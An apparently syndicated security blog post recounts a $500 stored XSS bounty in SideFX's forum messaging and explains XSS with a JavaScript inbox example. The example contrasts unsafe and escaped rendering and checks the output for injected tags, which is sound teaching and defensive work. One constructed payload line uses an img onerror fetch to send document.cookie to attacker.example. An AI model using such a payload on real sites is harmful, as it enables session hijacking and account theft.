The $500 Stored XSS Bug in SideFX’s Messaging System
The article describes how a Stored XSS vulnerability could be exploited to attack the SideFX community forum. The researcher who found the vulnerability received a $500 reward. The vulnerability allowed an attacker to steal users' login information by injecting malicious code. The article also explains the basics of XSS and its dangers, and encourages readers to learn how to detect similar vulnerabilities. 2025-10-10 11:0:36 Author: infosecwriteups.com

Hacking the Inbox: How a $500 Stored XSS Bug Exposed SideFX’s Messaging Flaw

Monika Sharma


In web security, a single tiny bug can cause big trouble. Imagine sending a friendly message on a forum, and that message quietly turning into a tool that steals logins. It happened for real on SideFX, the community hub for Houdini users. A researcher going by the handle itriedallthenamess reported a Stored Cross-Site Scripting (XSS) vulnerability in SideFX's messaging system. The reward: $500. Not bad for spotting something dangerous.

Don’t worry if you’re new to cybersecurity. This article explains what happened, why it mattered, and how you can find similar bugs yourself. By the end you should feel ready to try bug hunting responsibly.

What is Stored XSS? A Simple Breakdown

XSS (Cross-Site Scripting) is when an attacker gets a website to serve attacker-controlled script, so that the script runs in other users' browsers with that site's cookies and permissions. Think of it as slipping a fake note into a mailbox that explodes when opened.

There are three main flavors:

  • Stored XSS: the payload is saved by the server (in a message, profile, or comment) and served to every user who later views it. This is the kind that hit SideFX's messaging system.
  • Reflected XSS: the payload bounces straight back from a request (you click a bad link).
  • DOM-based XSS: client-side code mishandles data and runs the payload, without the server ever seeing it.
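To make the stored flavor concrete, here is an added example (not SideFX's code, and not from the original write-up) of a toy inbox that keeps messages server-side and renders them into HTML. The messages, the attacker payload and the `attacker.example` host are all constructed for illustration. The unsafe renderer splices the stored message body straight into markup, so the payload executes for every recipient who opens the inbox; the hardened renderer HTML-encodes each untrusted field at the point it is written into the page.

```javascript
// Added example (not SideFX's code): a toy inbox that stores messages and
// renders them into HTML, once unsafely and once with output encoding.

// Constructed sample messages: one benign, one carrying a stored XSS payload.
const inbox = [
  { from: "alice", body: "Hey, did you see the new Houdini release?" },
  {
    from: "attacker",
    // Constructed payload: fires in the recipient's browser when the inbox renders
    // and ships the session cookie to an attacker-controlled host.
    body: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  },
];

// Vulnerable renderer: trusts stored data and concatenates it into markup.
function renderUnsafe(messages) {
  return messages
    .map((m) => `<li><b>${m.from}</b>: ${m.body}</li>`)
    .join("\n");
}

// HTML-encode the five characters that can change the structure of an
// HTML text node or attribute value.
function escapeHtml(str) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: encode every untrusted field where it enters the HTML.
function renderSafe(messages) {
  return messages
    .map((m) => `<li><b>${escapeHtml(m.from)}</b>: ${escapeHtml(m.body)}</li>`)
    .join("\n");
}

// Structural check: does the output contain any tag the template did not emit?
// Strip the template's own <li>/<b> tags, then look for anything that still
// opens a tag. A stored payload that survived rendering shows up here.
function containsInjectedTag(html) {
  const stripped = html.replace(/<\/?(li|b)>/g, "");
  return /<[a-zA-Z]/.test(stripped);
}

console.log(containsInjectedTag(renderUnsafe(inbox))); // true
console.log(containsInjectedTag(renderSafe(inbox)));   // false
```

Output encoding is the fix that actually removes the bug; a Content-Security-Policy and the HttpOnly cookie flag are worth having as well, but they only limit what a successful injection can do (an HttpOnly cookie cannot be read by the payload above, yet the script can still act as the victim inside the page), so they are defense in depth rather than a substitute.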

Source: https://infosecwriteups.com/the-500-stored-xss-bug-in-sidefxs-messaging-system-e55e1121d391?source=rss----7b722bfd1b8d---4